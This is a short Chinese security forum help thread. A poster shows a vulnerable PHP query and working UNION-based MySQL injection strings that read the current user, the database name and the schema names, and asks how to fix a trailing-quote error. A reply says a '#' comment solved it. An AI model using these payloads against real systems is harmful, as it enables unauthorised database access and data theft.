首页
社区
课程
招聘
[求助]mysql 注入语句的单引号处理
发表于: 2018-3-30 16:08 1542

[求助]mysql 注入语句的单引号处理

2018-3-30 16:08
1542
PHP语句,select * from data where number <='{$number}'
当 number 为 201803-29' and 1=2 union select 1,2,3,4,5,concat(current_user(),' ',database())'
下面是可以的 select * from data where number <= '201803-29' and  1=2 union select 1,2,3,4,5,concat(current_user(),' ',database())''

当 number 为 201803-29' and 1=2  union select 1,2,3,4,5,SCHEMA_NAME from information_schema.SCHEMATA'
最终语句为 select * from data where number <='201803-29' and 1=2  union select 1,2,3,4,5,SCHEMA_NAME from information_schema.SCHEMATA''
执行时,会因为末尾两个单引号''出错,怎么弄


[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

最后于 2018-3-30 16:09 被小李世界编辑 ,原因:
收藏
免费 0
支持
分享
最新回复 (1)
雪    币: 2
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
解决了,加了#
2018-3-30 16:14
0
游客
登录 | 注册 方可回帖
返回
//